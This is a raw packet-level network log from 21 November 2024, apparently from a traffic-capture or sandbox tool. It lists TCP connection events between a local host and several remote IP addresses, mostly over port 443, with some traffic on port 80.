                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.444892883 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.481801987 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.481874943 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.482192039 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.482207060 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.482402086 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.482423067 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.482743979 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.482749939 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.636432886 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.636584997 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.636694908 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.648307085 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.648307085 CET49743443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.648355007 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.648385048 CET4434974313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.651796103 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.651833057 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.651886940 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.651985884 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652064085 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652239084 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652390957 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652411938 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652450085 CET49744443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652461052 CET4434974413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652587891 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.652622938 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.654530048 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.654616117 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.654696941 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.655249119 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.655282021 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.697418928 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.697570086 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.697652102 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.698281050 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.698326111 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.698355913 CET49745443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.698371887 CET4434974513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.723292112 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.723368883 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.723448038 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.723695040 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.723717928 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.836101055 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.836159945 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.836236954 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.840811968 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.840965986 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.841029882 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.841511011 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.841561079 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.841593027 CET49747443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.841609001 CET4434974713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.843686104 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.843730927 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.843763113 CET49746443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.843777895 CET4434974613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.850809097 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.850893021 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.850979090 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.853081942 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.853113890 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.853194952 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.853785992 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.853823900 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.854007006 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:02.854022980 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.450762033 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.451633930 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.451697111 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.452320099 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.452334881 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.459090948 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.459537029 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.459579945 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.459609032 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.459930897 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.459949017 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.460089922 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.460110903 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.460633039 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.460639954 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.649375916 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.649986029 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.649996996 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.650635958 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.650640011 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.652915001 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.653441906 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.653498888 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.654120922 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.654133081 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.893503904 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.893691063 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.893800020 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.894130945 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.894166946 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.894196033 CET49750443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.894211054 CET4434975013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895226955 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895319939 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895430088 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895637035 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895656109 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895679951 CET49748443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.895690918 CET4434974813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898341894 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898395061 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898510933 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898591995 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898627043 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898691893 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898893118 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898893118 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898905993 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.898947001 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902116060 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902266979 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902344942 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902436972 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902482033 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902509928 CET49749443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.902525902 CET4434974913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.905642033 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.905675888 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.905791998 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.906035900 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:04.906049967 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093075991 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093235970 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093310118 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093691111 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093703032 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093744040 CET49752443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.093750000 CET4434975213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.097734928 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.097814083 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.097939014 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.098160982 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.098192930 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.144843102 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.144932985 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.145034075 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.145343065 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.145402908 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.145431995 CET49751443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.145447016 CET4434975113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.149377108 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.149424076 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.149513006 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.149712086 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.149725914 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:05.916580915 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.036415100 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.036525011 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.037514925 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.157279015 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.685117960 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.685880899 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.685923100 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.686444044 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.686450005 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.690237999 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.690706015 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.690789938 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.691200018 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.691215992 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.726424932 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.726936102 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.726979971 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.727480888 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.727493048 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.888226032 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.910542011 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.910605907 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.910970926 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.910984993 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.933868885 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.934216022 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.934258938 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.934591055 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:06.934597015 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134054899 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134231091 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134340048 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134572983 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134572983 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134614944 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.134640932 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.137502909 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.137547016 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.137882948 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.138010025 CET49759443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.138020992 CET4434975913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155436993 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155492067 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155548096 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155673981 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155690908 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155726910 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.155734062 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.157504082 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.157546997 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.157607079 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.157706022 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.157720089 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.170860052 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.171029091 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.171127081 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.171127081 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.171171904 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.171190977 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.173767090 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.173829079 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.174269915 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.174462080 CET49761443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.174485922 CET4434976113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.338085890 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.338255882 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.338357925 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.356400013 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.356465101 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.356519938 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.356549025 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.359075069 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.359113932 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.359191895 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.359453917 CET49762443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.359458923 CET4434976213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.376835108 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.376971006 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.377088070 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.377212048 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.377238989 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.377254009 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.377270937 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.378938913 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.378979921 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.380800009 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.380892038 CET49763443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.380909920 CET4434976313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.460634947 CET8049758185.215.113.43192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.460828066 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.523160934 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.643220901 CET8049724199.232.214.172192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:07.643352985 CET4972480192.168.2.4199.232.214.172
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.940640926 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.941232920 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.941268921 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.941850901 CET49760443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.941862106 CET4434976013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.977005005 CET4975880192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.977283001 CET4976480192.168.2.4185.215.113.43
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:08.996732950 CET4434975913.107.246.45192.168.2.4
